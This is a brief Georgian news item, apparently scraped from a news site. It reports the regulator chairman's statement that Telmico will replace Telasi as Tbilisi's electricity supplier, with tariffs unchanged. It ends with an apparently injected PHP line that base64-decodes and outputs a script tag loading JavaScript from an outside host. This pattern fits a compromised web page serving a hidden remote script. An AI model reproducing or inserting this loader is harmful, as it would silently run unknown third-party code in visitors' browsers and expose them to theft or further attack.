gorgia
ავერსი jaluzi
სემეკის თავმჯდომარის, დავით ნარმანიას გაცხადებით, თბილისში აბონენტებს ელექტროენერგიას „თელასის“ ნაცვლად „თელმიკო“ მიაწვდის. ამის შესახებ დავით ნარმანიამ „ბიზნეს ფორმულას“ ეთერში განაცხადა.
 
ეს ცვლილება ქვეყნის ენერგეტიკაში მიმდინარე რეფორმებით არის განპირობებული. კანონით ერთმანეთისგან გაიმიჯნა ელექტროენერგიის განაწილების და მიწოდების საქმიანობები. შესაბამისად, თუკი აქამდე დენის მიწოდებასაც და განაწილებასაც ერთი და იგივე იურიდიული პირი უზრუნველყოფდა, ახლა ეს საქმიანობა გამიჯნულია.
 
სემეკის ინფორმაციით, მარეგულირებელმა 1 ივლისამდე უნდა განსაზღვროს ამ კომპანიებისთვის დენის მიწოდების ტარიფი, თუმცა ახალი ტარიფი მოქმედი ტარიფის იდენტური იქნება და ის მომხმარებლისთვის არაფერს შეცვლის.
1190
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");